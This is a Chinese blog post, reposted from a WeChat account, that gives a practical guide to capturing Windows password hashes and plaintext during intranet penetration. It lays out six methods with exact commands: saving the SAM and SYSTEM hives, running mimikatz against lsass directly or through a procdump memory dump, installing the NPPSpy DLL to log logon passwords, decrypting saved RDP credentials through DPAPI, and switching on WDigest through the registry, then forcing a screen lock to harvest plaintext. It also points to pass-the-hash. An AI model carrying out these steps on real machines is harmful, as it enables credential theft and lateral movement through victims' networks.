实战中抓取hash姿势总结

admin 2022年4月27日01:00:43评论414 views字数 2994阅读9分58秒阅读模式


 在内网渗透中,要想进行的顺利,抓取hash&明文起到功不可没的作用,所以在实战中总结了几种常用的抓取密码的方式,在这里分享出来,欢迎师傅们补充



01


reg配合本地mimikatz


1.利用工具:


mimikatz+reg doc命令


 

2.测试机器:


Windows server 2008r2


 

3.首先利用reg命令进行转储hash

 


reg save hklmsystem systemreg save hklmsam sam


实战中抓取hash姿势总结

2.将转储好的hash下载到本地,再使用mimikatz进行导出

 

lsadump::sam /sam:sam /system:system

实战中抓取hash姿势总结


然后找到administrator或者域账户的hash进行解密,如果解密不成功可以进行hash传递攻击


实战中抓取hash姿势总结





02


目标机器上传mimikatz直接导出


  1. 利用工具

mimikatz


2.测试机器


Windows server 2008 r2


3.mimikatz常规方式进行抓密码


将mimikatz上传到目标服务器中

privilege::debug  提升权限sekurlsa::logonpasswords   抓取明文密码


实战中抓取hash姿势总结




03


procdump配合mimikatz本地导出


1.利用工具:


mimikatz+procdump


procdump项目地址:


https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump


 

2.测试机器:


Windows server 2008r2


3.介绍


由于procdump是微软的旗下的产品,所以杀软不会进行查杀


3.将procdump上传到目标机器中


执行以下命令进行转储hash


procdump -accepteula -ma lsass.exe lsass.dmp

实战中抓取hash姿势总结


4.配合本地mimikatz进行获取hash


sekurlsa::minidump lsass.dmp    #这里也可以跟上绝对路径sekurlsa::tspkg


实战中抓取hash姿势总结


发现可以成功获取,这种也是和将mimikatz上传到目标服务器的抓取密码那种差不多



04


powershell通过键盘记录抓取密码



1.利用工具:


PasswordStealing


https://github.com/gtworek/PSBits/tree/master/PasswordStealing


2.测试机器:


Windows 7


3.使用管理员权限将文件夹内的-NPPSPY.dll放到C:Windowssystem32中

copy .NPPSPY.dll C:windowsSystem32

实战中抓取hash姿势总结


4.使用管理权限执行

powershell.exe -Exec Bypass .ConfigureRegistrySettings.ps1

实战中抓取hash姿势总结


5.注销账户/重启系统,重新登录


rundll32.exe user32.dll,LockWorkStation  #迫使管理员锁屏

实战中抓取hash姿势总结


6.等到管理员重新登录

在 C 盘根目录下可以看到 NPPSpy.txt里面记录了刚刚登录的账号和密码


实战中抓取hash姿势总结






05


抓取管理员远程桌面保存的密码


1.利用工具:


mimikatz


 

2.测试机器:


Windows server 2008r2


3.准备环境


将Windows server 2008 r2随便登录一台机器,并且保存密码


实战中抓取hash姿势总结


4.抓取保存记录


cmdkey /list # 查看当前保存的凭据列表

实战中抓取hash姿势总结


dir /a %userprofile%AppDataLocalMicrosoftCredentials*    # 遍历 Credentials目录下保存的凭据


实战中抓取hash姿势总结


99B4C386131B767B4338614ACA3ED610

可以看到上图有一个保存的凭据


5.构造命令


将刚才的99B4C386131B767B4338614ACA3ED610和现在你拿下的web服务器的用户名,进行拼接

实战中抓取hash姿势总结


当前用户名


dpapi::cred /in:C:UsersadministratorAppDataLocalMicrosoftCredentials99B4C386131B767B4338614ACA3ED610dpapi::cred /in:C:Users<用户名>AppDataLocalMicrosoftCredentials<凭据文件>

6.抓取masterkey


发现下图,得到的 pbData 就是凭据的加密数据,guidMasterKey 是凭据的 GUID。

然后将上图中得到的 guidMasterKey 值( {xxx-xxx-xxx-xxx-xxx})记录下来并执行以下命令,找到与 guidMasterKey 也就是下图执行结果中的 GUID 相关联的 MasterKey:


实战中抓取hash姿势总结


执行完成上述命令,该pbData已经加载到mimi当中,我们再进行执行以下命令即可获取Masterkey


privilege::debug  #提升mimi的权限sekurlsa::dpapi   #加载缓存pbData生成Masterkey


发现成功抓出masterkey

 

87be1a0035f6e202115ddce9167794b8c904ef8f4ef8f4e7d81ee0848984e82140692c625d2fd1593712f9c9bdabdedd5ef720d77f4dae25b04902ebe5983a887d3c5


实战中抓取hash姿势总结


7.获取保存凭据


最后执行以下命令,使用上面找到的 MasterKey 值破解指定的凭据文件 99B4C386131B767B4338614ACA3ED610:

然后将Masterkey拼接命令如下

获取凭证

dpapi::cred /in:C:UsersadministratorAppDataLocalMicrosoftCredentials99B4C386131B767B4338614ACA3ED610 /MasterKey:87be1a0035f6e202115ddce9167794b8c904ef8f4ef8f4e7d81ee0848984e82140692c625d2fd1593712f9c9bdabdedd5ef720d77f4dae25b04902ebe5983a887d3c5

实战中抓取hash姿势总结

实战中抓取hash姿势总结


虚拟机太小所以拼接一张图,

总结:抓取保存的rdp密码,一定是管理员登录rdp时候保存的,如果不是保存的就抓不到,所以根据自己的实战情况而定



06


修改注册表


1.利用工具:


mimikatz+reg doc命令


 

2.测试机器:


Windows server 2016


3.介绍


Windows server2012以上版本,不支持抓取明文的,所以就只能通过修改注册表,管理员注销重新登录才能进行抓取,这个跟上面的抓取键盘记录的有点类似,但是这个范围要更广,可以将该服务器上登录过的 用户都给抓出来


4.修改注册表

 

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f


实战中抓取hash姿势总结


5.锁定工作台


rundll32.exe user32.dll,LockWorkStation

实战中抓取hash姿势总结


重新登录


6.使用mimikatz进行导出


privilege::debugsekurlsa::logonpasswords #导出明文


实战中抓取hash姿势总结


今天的文章就到这里,欢迎师傅们三连,补充


原文始发于微信公众号(chaosec):实战中抓取hash姿势总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月27日01:00:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战中抓取hash姿势总结http://cn-sec.com/archives/949450.html

发表评论

匿名网友 填写信息